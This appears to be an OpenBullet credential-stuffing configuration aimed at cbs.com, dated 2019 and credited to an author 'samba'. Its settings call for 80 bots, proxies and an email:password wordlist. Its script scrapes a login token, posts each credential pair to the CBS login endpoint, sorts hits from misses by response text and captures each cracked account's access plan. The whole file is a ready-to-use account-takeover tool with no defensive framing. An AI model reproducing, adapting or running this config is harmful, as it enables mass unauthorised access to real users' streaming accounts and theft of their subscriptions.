[SETTINGS]
{
  "Name": "cbs.com",
  "SuggestedBots": 80,
  "LastModified": "2019-07-04T23:00:52.8592469+01:00",
  "AdditionalInfo": "",
  "Author": "samba",
  "Version": "1.0.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://www.cbs.com/all-access/user/signin/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "=\"tk_trp\" value=\"" "\"" -> VAR "tk_trp" 
REQUEST POST "https://www.cbs.com/account/login/" 
  CONTENT "j_username=<USER>&j_password=<PASS>&_remember_me=1&tk_trp=<tk_trp>" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "origin: https://www.cbs.com" 
  HEADER "referer: https://www.cbs.com/all-access/user/signin/" 
KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Invalid email and\/or password" 
  KEYCHAIN Success OR 
    KEY "display_name" 
REQUEST GET "https://www.cbs.com/all-access/account/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
PARSE "<SOURCE>" LR "Limited Commercials " "</" -> CAP "Access Plan" 
